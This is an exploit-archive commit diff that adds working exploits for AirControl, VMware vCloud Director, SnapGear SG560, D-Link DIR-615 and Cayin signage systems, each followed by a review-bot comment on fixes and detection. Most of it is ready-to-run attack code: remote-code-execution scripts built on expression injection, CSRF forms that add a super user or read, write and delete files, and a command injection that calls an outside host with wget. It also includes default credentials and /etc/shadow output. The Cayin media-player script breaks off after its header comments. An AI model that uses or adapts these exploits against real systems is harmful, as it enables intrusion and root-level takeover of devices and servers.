DB: 2020-06-05
17 changes to exploits/shellcodes

IObit Uninstaller 9.5.0.15 - 'IObit Uninstaller Service' Unquoted Service Path
AirControl 1.4.2 - PreAuth Remote Code Execution
Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
Clinic Management System 1.0 - Unauthenticated Remote Code Execution
Navigate CMS 2.8.7 - 'sidx' SQL Injection (Authenticated)
Oriol Espinal CMS 1.0 - 'id' SQL Injection
Clinic Management System 1.0 - Authenticated Arbitrary File Upload
Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
Navigate CMS 2.8.7 - Authenticated Directory Traversal
D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
Online Marriage Registration System 1.0 - Remote Code Execution
Cayin Content Management Server 11.0 - Remote Command Injection (root)
SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
Cayin Signage Media Player 3.0 - Remote Command Injection (root)
Cayin Digital Signage System xPost 2.5 - Remote Command Injection
parent dfb79e06a1
commit 533f33f3f4
18 changed files with 1257 additions and 0 deletions
30
exploits/hardware/webapps/48541.py
Executable file
@ -0,0 +1,30 @@
# Exploit Title: AirControl 1.4.2 - PreAuth Remote Code Execution
|
||||
# Date: 2020-06-03
|
||||
# Exploit Author: 0xd0ff9 vs j3ssie
|
||||
# Vendor Homepage: https://www.ui.com/
|
||||
# Software Link: https://www.ui.com/download/#!utilities
|
||||
# Version: AirControl <= 1.4.2
|
||||
# Signature: https://github.com/jaeles-project/jaeles-signatures/blob/master/cves/aircontrol-rce.yaml
|
||||
|
||||
import requests
|
||||
import re
|
||||
import urllib
|
||||
import sys
|
||||
|
||||
|
||||
print """USAGE: python exploit_aircontrol.py [url] [cmd]"""
|
||||
|
||||
|
||||
url = sys.argv[1]
|
||||
cmd = sys.argv[2]
|
||||
|
||||
|
||||
burp0_url = url +"/.seam?actionOutcome=/pwn.xhtml?pwned%3d%23{expressions.getClass().forName('java.io.BufferedReader').getDeclaredMethod('readLine').invoke(''.getClass().forName('java.io.BufferedReader').getConstructor(''.getClass().forName('java.io.Reader')).newInstance(''.getClass().forName('java.io.InputStreamReader').getConstructor(''.getClass().forName('java.io.InputStream')).newInstance(''.getClass().forName('java.lang.Process').getDeclaredMethod('getInputStream').invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime').invoke(null),'"+cmd+"')))))}"
|
||||
burp0_headers = {"User-Agent": "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Doflamingo) Chrome/80.0.3984.0 Safari/537.36", "Connection": "close"}
|
||||
r = requests.get(burp0_url, headers=burp0_headers, verify=False, allow_redirects=False)
|
||||
|
||||
Locat = r.headers["Location"]
|
||||
|
||||
res = re.search("pwned=(.*)(&cid=.*)",Locat).group(1)
|
||||
|
||||
print "[Result CMD] ",cmd,": ",urllib.unquote_plus(res)
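Review bot: the header block at the top of 48541.py has no `# CVE:` and no `# Tested on:` line, and nothing states that the script is Python 2 only, although the `print """..."""` statement and `urllib.unquote_plus` (both Python 2 syntax/API) mean it will not start under Python 3; add those header lines. The single request it builds (`/.seam?actionOutcome=` with `getClass().forName(` chained in the query string) is also the pattern a defender should alert on in web-server access logs for AirControl hosts, and the response handling (`r.headers["Location"]` parsed for `pwned=`) shows that the expression result is reflected in a redirect, so a 302 whose Location header carries command output is the corroborating artifact; the fix on the product side is to stop evaluating client-supplied `actionOutcome` values as expressions. Also, `verify=False` disables TLS certificate validation without suppressing the resulting urllib3 warning, which will print on every run.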
28
exploits/hardware/webapps/48551.txt
Normal file
@ -0,0 +1,28 @@
# Exploit Title: D-Link DIR-615 T1 20.10 - CAPTCHA Bypass
|
||||
# Date: 2019-10-12
|
||||
# Exploit Author: huzaifa hussain
|
||||
# Vendor Homepage: https://in.dlink.com/
|
||||
# Version: DIR-615 T1 ver:20.10
|
||||
# Tested on: D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
|
||||
# CVE: CVE-2019-17525
|
||||
|
||||
D-LINK ROUTER "MODEL NO: DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1
|
||||
|
||||
A vulnerability found on login-in page of D-LINK ROUTER "DIR-615" with "FIRMWARE VERSION:20.10" & "HARDWARE VERSION:T1" which allows attackers to easily bypass CAPTCHA on login page by BRUTEFORCING.
|
||||
|
||||
------------------------------------
|
||||
D-Link released new firmware designed to protect against logging in to the router using BRUTEFORCING. There is a flaw in the captcha authentication system that allows an attacker to reuse the same captcha without reloading new.
|
||||
|
||||
ATTACK SCENARIO AND REPRODUCTION STEPS
|
||||
|
||||
1: Find the ROUTER LoginPage.
|
||||
2: Fill the required login credentials.
|
||||
3: Fill the CAPTCH properly and Intercept the request in Burpsuit.
|
||||
4: Send the Request to Intruder and select the target variables i.e. username & password which will we bruteforce under Positions Tab
|
||||
5: Set the payloads on target variables i.e. username & password under Payloads Tab.
|
||||
5: Set errors in (the validatecode is invalid & username or password error, try again) GREP-MATCH under Options Tab.
|
||||
6: Now hit the start attack and you will find the correct credentials.
|
||||
|
||||
-------------------------------------
|
||||
|
||||
Huzaifa Hussain
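Review bot: the reproduction steps number two different steps as `5:` (the Payloads step and the GREP-MATCH step), the `# Tested on:` line and its repeat in the body open a quote before `HARDWARE VERSION:T1` that is never closed, and `CAPTCH` / `Burpsuit` are misspelled; renumber the steps and close the quote. The substance of the finding is the one sentence under the separator: the firmware accepts the same validated CAPTCHA value again without issuing a new one, which turns the CAPTCHA into a fixed token and leaves only the username/password check standing against a brute-force attempt. On the defence side that means a per-session, single-use CAPTCHA value that is invalidated after any login attempt (successful or not), plus lockout or rate limiting on failed logins; in logs the signature is a burst of login POSTs that all carry an identical CAPTCHA value and differ only in the credential fields.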
72
exploits/hardware/webapps/48554.txt
Normal file
@ -0,0 +1,72 @@
# Title: SnapGear Management Console SG560 3.1.5 - Cross-Site Request Forgery (Add Super User)
|
||||
# Author: LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: http://www.securecomputing.com
|
||||
# CVE: N/A
|
||||
|
||||
Secure Computing SnapGear Management Console SG560 v3.1.5 CSRF Add Super User
|
||||
|
||||
|
||||
Vendor: Secure Computing Corp.
|
||||
Product web page: http://www.securecomputing.com
|
||||
Affected version: 3.1.5u1
|
||||
|
||||
Summary: The SG gateway appliance range provides Internet security and
|
||||
privacy of communications for small and medium enterprises, and branch
|
||||
offices. It simply and securely connects your office to the Internet,
|
||||
and with its robust stateful firewall, shields your computers from
|
||||
external threats.
|
||||
|
||||
Desc: The application interface allows users to perform certain actions
|
||||
via HTTP requests without performing any validity checks to verify the
|
||||
requests. This can be exploited to perform certain actions with administrative
|
||||
privileges if a logged-in user visits a malicious web site.
|
||||
|
||||
Tested on: fnord/1.9
|
||||
Apache 1.3.27 (Unix)
|
||||
Linux 2.4.31
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5567
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5567.php
|
||||
|
||||
|
||||
14.05.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
CSRF Add Super User:
|
||||
--------------------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/adminusers" method="POST">
|
||||
<input type="hidden" name=".form" value="edit" />
|
||||
<input type="hidden" name=".page" value="adminusers_edit" />
|
||||
<input type="hidden" name="login" value="testingus" />
|
||||
<input type="hidden" name="fullname" value="ZSL" />
|
||||
<input type="hidden" name="password" value="123456" />
|
||||
<input type="hidden" name="confirm" value="123456" />
|
||||
<input type="hidden" name="acl.login" value="on" />
|
||||
<input type="hidden" name="acl.admin" value="on" />
|
||||
<input type="hidden" name="acl.diags" value="on" />
|
||||
<input type="hidden" name="acl.saverestore" value="on" />
|
||||
<input type="hidden" name="acl.setpassword" value="on" />
|
||||
<input type="hidden" name="finish" value="Finish" />
|
||||
<input type="hidden" name=".defaultname" value="finish" />
|
||||
<input type="submit" value="Idemo" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
Result /etc/shadow:
|
||||
|
||||
root:$1$YC$T/M8HLRXxKKPVEO7SU.02/:0:0:Super User:/:/bin/sh
|
||||
sshd:!!:100:65534::/home:/bin/false
|
||||
clamav:!!:103:65534::/home:/bin/false
|
||||
testingus:$1$Xy$bxdLgsRlXHoMjEcMKqVq/.:104:104:ZSL:/home:/bin/sh
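Review bot: the description says the interface performs no validity checks on the request, and the PoC confirms it: the form carries only the business parameters (`login`, `password`, the `acl.*` flags) and no session-bound token, so a forged cross-site POST to `/cgi-bin/cgix/adminusers` is accepted on the strength of the victim's cookie alone. The missing control is a per-session anti-CSRF token validated server-side on `adminusers` (a `SameSite` cookie attribute and an Origin/Referer check are secondary mitigations); for detection, a POST to that path whose Referer is not the appliance's own management UI is the signature. Worth adding to the advisory: the `/etc/shadow` excerpt shows the appliance storing passwords as `$1$` md5crypt hashes, a legacy format that is cheap to crack offline, which raises the impact of any disclosure of that file.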
95
exploits/hardware/webapps/48556.txt
Normal file
@ -0,0 +1,95 @@
# Title: Secure Computing SnapGear Management Console SG560 3.1.5 - Arbitrary File Read
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: http://www.securecomputing.com
|
||||
# CVE: N/A
|
||||
|
||||
Secure Computing SnapGear Management Console SG560 v3.1.5 Arbitrary File Read/Write
|
||||
|
||||
|
||||
Vendor: Secure Computing Corp.
|
||||
Product web page: http://www.securecomputing.com
|
||||
Affected version: 3.1.5u1
|
||||
|
||||
Summary: The SG gateway appliance range provides Internet security and
|
||||
privacy of communications for small and medium enterprises, and branch
|
||||
offices. It simply and securely connects your office to the Internet,
|
||||
and with its robust stateful firewall, shields your computers from
|
||||
external threats.
|
||||
|
||||
Desc: The application allows the currently logged-in user to edit the
|
||||
configuration files in the system using the CGI executable 'edit_config_files'
|
||||
in /cgi-bin/cgix/. The files that are allowed to be modified (read/write/delete)
|
||||
are located in the /etc/config/ directory. An attacker can manipulate
|
||||
the POST request parameters to escape from the restricted environment
|
||||
by using absolute path and start reading, writing and deleting arbitrary
|
||||
files on the system.
|
||||
|
||||
Tested on: fnord/1.9
|
||||
Apache 1.3.27 (Unix)
|
||||
Linux 2.4.31
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5568
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5568.php
|
||||
|
||||
|
||||
14.05.2020
|
||||
|
||||
--
|
||||
|
||||
|
||||
Read:
|
||||
-----
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="choices" />
|
||||
<input type="hidden" name=".page" value="select_file" />
|
||||
<input type="hidden" name="name$1337" value="/var/log/messages" />
|
||||
<input type="hidden" name="modify$1337" value="1" />
|
||||
<input type="hidden" name=".defaultname" value="newitem" />
|
||||
<input type="submit" value="Read" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Write/overwrite/move:
|
||||
---------------------
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="edit" />
|
||||
<input type="hidden" name=".page" value="edit_file" />
|
||||
<input type="hidden" name="enabled$0" value="" />
|
||||
<input type="hidden" name="name$0" value="/etc/motd" />
|
||||
<input type="hidden" name="mode$0" value="" />
|
||||
<input type="hidden" name="filename" value="/etc/motd" />
|
||||
<input type="hidden" name="filecontents" value="pwned" />
|
||||
<input type="hidden" name="finish" value="Finish" />
|
||||
<input type="hidden" name=".defaultname" value="finish" />
|
||||
<input type="submit" value="Write" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
Delete:
|
||||
-------
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.2.2/cgi-bin/cgix/edit_config_files" method="POST">
|
||||
<input type="hidden" name=".form" value="choices" />
|
||||
<input type="hidden" name=".page" value="select_file" />
|
||||
<input type="hidden" name="name$251" value="/root/.secret" />
|
||||
<input type="hidden" name="delete$251" value="1" />
|
||||
<input type="hidden" name=".defaultname" value="newitem" />
|
||||
<input type="submit" value="Delete" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
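Review bot: the header title says 'Arbitrary File Read', but the body title and the three forms (`modify$1337`, `edit_file` with `filecontents`, `delete$251`) document read, write/overwrite and delete, so the header understates the scope; also `# Author:LiquidWorm` is missing the space used in the other advisories. The root cause stated in the description is that `edit_config_files` trusts the submitted `name$N` / `filename` value and only intends to confine it to /etc/config/: the fix is to resolve the submitted path, reject absolute paths and any result whose canonical form lies outside /etc/config/, or better, select files by index from a server-side allowlist rather than by path. The write example targeting /etc/motd and the delete example targeting /root/.secret also show the CGI running with enough privilege to touch root-owned files, so the executable should not run as root. Note that these are plain HTML forms without any token, so the issue chains with the CSRF weakness reported in 48554.txt in this same commit.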
138
exploits/java/webapps/48549.py
Executable file
@ -0,0 +1,138 @@
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
|
||||
# Exploit Author: Tomas Melicher
|
||||
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
|
||||
# Date: 2020-05-24
|
||||
# Vendor Homepage: https://www.vmware.com/
|
||||
# Software Link: https://www.vmware.com/products/cloud-director.html
|
||||
# Tested On: vCloud Director 9.7.0.15498291
|
||||
# Vulnerability Description:
|
||||
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
import argparse # pip install argparse
|
||||
import base64, os, re, requests, sys
|
||||
if sys.version_info >= (3, 0):
|
||||
from urllib.parse import urlparse
|
||||
else:
|
||||
from urlparse import urlparse
|
||||
|
||||
from requests.packages.urllib3.exceptions import InsecureRequestWarning
|
||||
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
|
||||
|
||||
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
|
||||
session = requests.Session()
|
||||
|
||||
def login(url, username, password, verbose):
|
||||
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
|
||||
res = session.get(target_url)
|
||||
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
tenant = match.group(1)
|
||||
else:
|
||||
print('[!] can\'t find tenant identifier')
|
||||
return
|
||||
|
||||
if verbose:
|
||||
print('[*] tenant: %s'%(tenant))
|
||||
|
||||
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
|
||||
if match: # Cloud Director 9.*
|
||||
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
|
||||
res = session.post(login_url, data={'username':username,'password':password})
|
||||
if res.status_code == 401:
|
||||
print('[!] invalid credentials')
|
||||
return
|
||||
else: # Cloud Director 10.*
|
||||
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
|
||||
headers = {
|
||||
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
|
||||
'Accept': 'application/json;version=29.0',
|
||||
'Content-type': 'application/json;version=29.0'
|
||||
}
|
||||
res = session.post(login_url, headers=headers)
|
||||
if res.status_code == 401:
|
||||
print('[!] invalid credentials')
|
||||
return
|
||||
else:
|
||||
print('[!] url for login form was not found')
|
||||
return
|
||||
|
||||
cookies = session.cookies.get_dict()
|
||||
jwt = cookies['vcloud_jwt']
|
||||
session_id = cookies['vcloud_session_id']
|
||||
|
||||
if verbose:
|
||||
print('[*] jwt token: %s'%(jwt))
|
||||
print('[*] session_id: %s'%(session_id))
|
||||
|
||||
res = session.get(target_url)
|
||||
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
|
||||
if match is None:
|
||||
print('[!] organization not found')
|
||||
return
|
||||
organization = match.group(1)
|
||||
if verbose:
|
||||
print('[*] organization name: %s'%(organization))
|
||||
|
||||
match = re.search(r'orgId : \'([^\']+)', res.content)
|
||||
if match is None:
|
||||
print('[!] orgId not found')
|
||||
return
|
||||
org_id = match.group(1)
|
||||
if verbose:
|
||||
print('[*] organization identifier: %s'%(org_id))
|
||||
|
||||
return (jwt,session_id,organization,org_id)
|
||||
|
||||
|
||||
def exploit(url, username, password, command, verbose):
|
||||
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
|
||||
|
||||
headers = {
|
||||
'Accept': 'application/*+xml;version=29.0',
|
||||
'Authorization': 'Bearer %s'%jwt,
|
||||
'x-vcloud-authorization': session_id
|
||||
}
|
||||
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
|
||||
res = session.get(admin_url, headers=headers)
|
||||
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
|
||||
if match:
|
||||
version = match.group(1)
|
||||
if verbose:
|
||||
print('[*] detected version of Cloud Director: %s'%(version))
|
||||
else:
|
||||
version = None
|
||||
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
|
||||
|
||||
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
|
||||
|
||||
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
|
||||
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
|
||||
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
|
||||
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
|
||||
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
|
||||
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
|
||||
res = session.put(email_settings_url, data=data, headers=headers)
|
||||
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
|
||||
|
||||
if verbose:
|
||||
print('')
|
||||
try:
|
||||
print(base64.b64decode(match.group(1)))
|
||||
except Exception:
|
||||
print(res.content)
|
||||
|
||||
|
||||
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
|
||||
parser.add_argument('-v', action='store_true')
|
||||
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
|
||||
parser.add_argument('-u', metavar='username', required=True)
|
||||
parser.add_argument('-p', metavar='password', required=True)
|
||||
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
|
||||
args = parser.parse_args()
|
||||
|
||||
url = urlparse(args.t)
|
||||
exploit(url, args.u, args.p, args.c, args.v)
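Review bot: the header has no `# CVE:` line although the Technical Details URL names CVE-2020-3956; add it. The `# pip install argparse` comment is misleading (argparse is in the standard library), and although the `urlparse` import is shimmed for Python 3, the script is Python 2 only: `re.search` is run on `res.content` (bytes under Python 3) with `str` patterns, and `base64.b64encode` is given a `str`, both of which raise under Python 3, so the header should say so. `version` in `exploit()` is computed and printed but never used afterwards. For defenders, the injection point is the `SmtpServerSettings/Host` element of the org email settings document PUT to `/api/admin/org/<orgId>/settings/email`, and the result is read back from a `value: [...]` fragment of the error response; a PUT to that endpoint whose Host element contains `${` is the log signature, and a hostname field that is later evaluated as an expression is the flaw to fix (validate it as a hostname and never hand it to an expression evaluator), beyond applying the vendor fix for the cited CVE.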
139
exploits/multiple/webapps/48553.txt
Normal file
@ -0,0 +1,139 @@
# Title: Cayin Content Management Server 11.0 - Remote Command Injection (root)
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
Cayin Content Management Server 11.0 Root Remote Command Injection
|
||||
|
||||
|
||||
Vendor: CAYIN Technology Co., Ltd.
|
||||
Product web page: https://www.cayintech.com
|
||||
Affected version: CMS-SE v11.0 Build 19179
|
||||
CMS-SE v11.0 Build 19025
|
||||
CMS-SE v11.0 Build 18325
|
||||
CMS Station (CMS-SE-LXC)
|
||||
CMS-60 v11.0 Build 19025
|
||||
CMS-40 v9.0 Build 14197
|
||||
CMS-40 v9.0 Build 14099
|
||||
CMS-40 v9.0 Build 14093
|
||||
CMS-20 v9.0 Build 14197
|
||||
CMS-20 v9.0 Build 14092
|
||||
CMS v8.2 Build 12199
|
||||
CMS v8.0 Build 11175
|
||||
CMS v7.5 Build 11175
|
||||
|
||||
Summary: CAYIN Technology provides Digital Signage
|
||||
solutions, including media players, servers, and
|
||||
software designed for the DOOH (Digital Out-of-home)
|
||||
networks. We develop industrial-grade digital signage
|
||||
appliances and tailored services so you don't have
|
||||
to do the hard work.
|
||||
|
||||
Desc: CAYIN CMS suffers from an authenticated OS
|
||||
semi-blind command injection vulnerability using
|
||||
default credentials. This can be exploited to inject
|
||||
and execute arbitrary shell commands as the root
|
||||
user through the 'NTP_Server_IP' HTTP POST parameter
|
||||
in system.cgi page.
|
||||
|
||||
Tested on: Apache/1.3.42 (Unix)
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2020-5570
|
||||
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5570.php
|
||||
|
||||
|
||||
15.05.2020
|
||||
|
||||
---
|
||||
|
||||
|
||||
Session created with default credentials (webadmin:bctvadmin).
|
||||
|
||||
HTTP POST Request:
|
||||
-----------------
|
||||
|
||||
POST /cgi-bin/system.cgi HTTP/1.1
|
||||
Host: 192.168.1.3
|
||||
Content-Length: 201
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
User-Agent: Smith
|
||||
Origin: http://192.168.1.3
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
||||
Referer: http://192.168.1.3/cgi-bin/system.cgi
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept-Language: en-US,en;q=0.9
|
||||
Cookie: cy_lang=ZH_TW; cy_us=67176fd7d3d05812008; cy_en=c8bef8607e54c99059cc6a36da982f9c009; WEB_STR_RC_MGR=RC_MGR_WEB_PLAYLIST; WEB_STR_SYSTEM=SYSTEM_SETTING; cy_cgi_tp=1591206269_15957
|
||||
Connection: close
|
||||
|
||||
|
||||
save_system: 1
|
||||
system_date: 2020/5/16 06:36:48
|
||||
TIMEZONE: 49
|
||||
NTP_Service: 1
|
||||
NTP_Server_IP: $(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)
|
||||
TEST_NTP: 測試
|
||||
reboot1: 1
|
||||
reboot_sel1: 4
|
||||
reboot_sel2: 1
|
||||
reboot_sel3: 1
|
||||
font_list: ZH_TW
|
||||
|
||||
|
||||
Request recorder @ ZSL:
|
||||
-----------------------
|
||||
|
||||
Origin of HTTP request: 192.168.1.3:61347
|
||||
HTTP GET request to vrfy.zeroscience.mk:
|
||||
|
||||
GET / HTTP/1.0
|
||||
User-Agent: MyVoiceIsMyPassportVerifyMe
|
||||
Host: vrfy.zeroscience.mk
|
||||
Accept: */*
|
||||
Connection: Keep-Alive
|
||||
|
||||
|
||||
PoC script:
|
||||
-----------
|
||||
|
||||
import requests
|
||||
|
||||
url = "http://192.168.1.3:80/cgi-bin/system.cgi"
|
||||
|
||||
cookies = {"cy_lang": "ZH_TW",
|
||||
"cy_us": "67176fd7d3d05812008",
|
||||
"cy_en": "c8bef8607e54c99059cc6a36da982f9c009",
|
||||
"WEB_STR_RC_MGR": "RC_MGR_WEB_PLAYLIST",
|
||||
"WEB_STR_SYSTEM": "SYSTEM_SETTING",
|
||||
"cy_cgi_tp": "1591206269_15957"}
|
||||
|
||||
headers = {"Cache-Control": "max-age=0",
|
||||
"Origin": "http://192.168.1.3",
|
||||
"Content-Type": "application/x-www-form-urlencoded",
|
||||
"User-Agent": "Smith",
|
||||
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||
"Referer": "http://192.168.1.3/cgi-bin/system.cgi",
|
||||
"Accept-Encoding": "gzip, deflate",
|
||||
"Accept-Language": "en-US,en;q=0.9",
|
||||
"Connection": "close"}
|
||||
|
||||
data = {"save_system": "1",
|
||||
"system_date": "2020/5/16 06:36:48",
|
||||
"TIMEZONE": "49",
|
||||
"NTP_Service": "1",
|
||||
"NTP_Server_IP": "$(wget -q -U 'MyVoiceIsMyPassportVerifyMe' vrfy.zeroscience.mk)", # `cmd` or &cmd&
|
||||
"TEST_NTP": "\xe6\xb8\xac\xe8\xa9\xa6",
|
||||
"reboot1": "1",
|
||||
"reboot_sel1": "4",
|
||||
"reboot_sel2": "1",
|
||||
"reboot_sel3": "1",
|
||||
"font_list": "ZH_TW"}
|
||||
|
||||
requests.post(url, headers=headers, cookies=cookies, data=data)
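Review bot: `# Author:LiquidWorm` is missing its space, and the title's '(root)' claim is not evidenced anywhere in this file: the only proof of execution is the callback recorded at vrfy.zeroscience.mk (the `MyVoiceIsMyPassportVerifyMe` User-Agent arriving from 192.168.1.3), which shows that `wget` ran but says nothing about which user ran it; either add the evidence or drop '(root)' from the title. Consistent with the 'semi-blind' wording, the PoC returns no command output, so an out-of-band DNS/HTTP callback is what a detection team should expect from this class of probe. The precondition is the default credential pair stated before the request, so forcing a password change on first login is part of the fix alongside validating `NTP_Server_IP` as a hostname or IP address before it reaches a shell; the comment in the PoC lists the three injection forms (`$( )`, backticks, `&`), and any of those characters in that POST parameter to `/cgi-bin/system.cgi` is the thing to alert on.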
130
exploits/multiple/webapps/48557.py
Executable file
@ -0,0 +1,130 @@
# Title: Cayin Signage Media Player 3.0 - Remote Command Injection (root)
|
||||
# Author:LiquidWorm
|
||||
# Date: 2020-06-04
|
||||
# Vendor: https://www.cayintech.com
|
||||
# CVE: N/A
|
||||
|
||||
#!/usr/bin/env python3
|
||||
#
|
||||
#
|
||||
# Cayin Signage Media Player 3.0 Root Remote Command Injection
|
||||
#
|
||||
#
|
||||
# Vendor: CAYIN Technology Co., Ltd.
|
||||
# Product web page: https://www.cayintech.com
|
||||
# Affected version: SMP-8000QD v3.0
|
||||
# SMP-8000 v3.0
|
||||
# SMP-6000 v3.0 Build 19025
|
||||
# SMP-6000 v1.0 Build 14246
|
||||
# SMP-6000 v1.0 Build 14199
|
||||
# SMP-6000 v1.0 Build 14167
|
||||
# SMP-6000 v1.0 Build 14097
|
||||
# SMP-6000 v1.0 Build 14090
|
||||
# SMP-6000 v1.0 Build 14069
|
||||
# SMP-6000 v1.0 Build 14062
|
||||
# SMP-4000 v1.0 Build 14098
|
||||
# SMP-4000 v1.0 Build 14092
|
||||
# SMP-4000 v1.0 Build 14087
|
||||
# SMP-2310 v3.0
|
||||
# SMP-2300 v3.0 Build 19316
|
||||
# SMP-2210 v3.0 Build 19025
|
||||
# SMP-2200 v3.0 Build 19029
|
||||
# SMP-2200 v3.0 Build 19025
|
||||
# SMP-2100 v10.0 Build 16228
|
||||
# SMP-2100 v3.0
|
||||
# SMP-2000 v1.0 Build 14167
|
||||
# SMP-2000 v1.0 Build 14087
|
||||
# SMP-1000 v1.0 Build 14099
|
||||
# SMP-PROPLUS v1.5 Build 10081
|
||||
# SMP-WEBPLUS v6.5 Build 11126
|
||||
# SMP-WEB4 v2.0 Build 13073
|
||||
# SMP-WEB4 v2.0 Build 11175
|
||||
# SMP-WEB4 v1.5 Build 11476
|
||||
# SMP-WEB4 v1.5 Build 11126
|
||||
# SMP-WEB4 v1.0 Build 10301
|
||||
# SMP-300 v1.0 Build 14177
|
||||
# SMP-200 v1.0 Build 13080
|
||||
# SMP-200 v1.0 Build 12331
|
||||
# SMP-PRO4 v1.0
|
||||
# SMP-NEO2 v1.0
|
||||
# SMP-NEO v1.0
|
||||
#
|
||||
# Summary: CAYIN Technology provides Digital Signage
|
||||
# solutions, including media players, servers, and
|
||||
# software designed for the DOOH (Digital Out-of-home)
|
||||
# networks. We develop industrial-grade digital signage
|
||||
# appliances and tailored services so you don't have
|
||||
# to do the hard work.
|
||||
#
|
||||
# Desc: CAYIN SMP-xxxx suffers from an authenticated
|
||||
# OS command injection vulnerability using default
|
||||
# credentials. This can be exploited to inject and
|
||||
# execute arbitrary shell commands as the root user
|
||||
# through the 'NTP_Server_IP' HTTP GET parameter in
|
||||
# system.cgi and wizard_system.cgi pages.
|
||||
#
|
||||
# -----------------------------------------------------
|
||||
